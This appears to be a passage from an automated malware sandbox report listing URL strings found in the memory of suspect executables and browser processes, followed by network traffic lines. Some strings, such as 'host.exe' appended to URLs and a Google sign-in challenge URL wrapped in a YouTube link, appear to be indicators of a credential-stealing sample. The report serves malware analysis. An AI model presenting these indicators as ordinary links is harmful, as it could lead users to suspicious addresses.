Source: file.exe, 00000000.00000003.1903881108.000000000081E000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659262617.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2658810140.0000000005EE2000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659096491.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2810661969.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2813113663.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3006184749.00006DEC00840000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: 0718eb7837.exe, 0000000E.00000003.2800298757.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2745898979.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2777576884.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2801780586.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEM
Source: file.exe, 00000000.00000002.2129788119.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2943434775.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2940508064.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2943608468.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2940443306.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2899808146.0000023BA08CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2898025949.00000139662C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3219423651.0000024F6FBAC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: chrome.exe, 00000022.00000003.2883243681.00006DEC00EF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2879059673.00006DEC00CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2995804645.00006DEC002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010230878.00006DEC00A58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2998895852.00006DEC0042C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3008634598.00006DEC009E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3008634598.00006DEC009EB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2999305578.00006DEC0049C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2878914967.00006DEC00CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3006184749.00006DEC00840000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3003100882.00006DEC006B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3002436204.00006DEC00628000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000022.00000002.3008065191.00006DEC00988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3006787029.00006DEC00884000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2938535672.00006DEC001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000022.00000002.3008065191.00006DEC00988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3006787029.00006DEC00884000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2938535672.00006DEC001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 00000022.00000002.3007568961.00006DEC0091C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=
Source: firefox.exe, 0000001E.00000003.2786740270.0000019DE583C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2787450056.0000019DE5877000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2785045981.0000019DE7B00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2786290787.0000019DE581F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2787260190.0000019DE585A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F701E2000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3378294380.0000024F74BCE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: file.exe, 00000000.00000003.1903881108.000000000081E000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659262617.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2658810140.0000000005EE2000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659096491.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2810661969.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2813113663.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3002436204.00006DEC00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3005526682.00006DEC007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3000146446.00006DEC004FC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 0000001E.00000003.2786740270.0000019DE583C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2787450056.0000019DE5877000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2785045981.0000019DE7B00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2786290787.0000019DE581F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2787260190.0000019DE585A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F701E2000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3378294380.0000024F74BCE000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3378129656.0000024F74B55000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 00000022.00000002.2999783272.00006DEC004C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000022.00000002.2929870751.00006DEC0001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3001497541.00006DEC005D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013398134.00006DEC00BD8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000022.00000002.2999783272.00006DEC004C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: file.exe, 00000000.00000002.2130376795.0000000000C94000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: 0718eb7837.exe, 00000010.00000003.2898670007.0000000005F63000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: file.exe, 00000000.00000002.2130376795.0000000000C94000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: file.exe, 00000000.00000002.2130376795.0000000000D77000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2130376795.0000000000C94000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: file.exe, 00000000.00000002.2130376795.0000000000D77000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/W1sYnpxLnB3ZA==
Source: 0718eb7837.exe, 00000010.00000003.2898670007.0000000005F63000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000002.2130376795.0000000000C94000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2031655381.00000000236B6000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2720440308.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2898670007.0000000005F63000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 0718eb7837.exe, 00000010.00000003.2898670007.0000000005F63000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: file.exe, 00000000.00000002.2130376795.0000000000C94000.00000040.00000001.01000000.00000003.sdmp, firefox.exe, 0000001F.00000002.2899808146.0000023BA08CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2898025949.00000139662C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3219423651.0000024F6FB57000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: file.exe, 00000000.00000003.2031655381.00000000236B6000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2720440308.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2898670007.0000000005F63000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.2130376795.0000000000C94000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: firefox.exe, 0000001F.00000002.2898864384.0000023BA0650000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/sig
Source: firefox.exe, 00000021.00000002.2901452031.00000139663A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/sig;
Source: firefox.exe, 00000021.00000002.2897094701.000001396603A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2901452031.00000139663A4000.00000004.00000020.00020000.00000000.sdmp, 2922d7c574.exe, 00000025.00000003.2950012416.0000000001654000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3127317780.0000024F64403000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3120454530.0000024F64090000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3127317780.0000024F6445D000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3120454530.0000024F640A0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3121458073.0000024F641C0000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3365411007.0000024F73761000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000021.00000002.2897094701.0000013966030000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd(
Source: firefox.exe, 0000001C.00000002.2773952391.000002C86DDE0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2781201402.00000196D420B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3120454530.0000024F640A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 0000001F.00000002.2897862516.0000023BA0500000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2898864384.0000023BA0654000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2901452031.00000139663A4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2897094701.0000013966030000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3159881754.0000024F65CA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
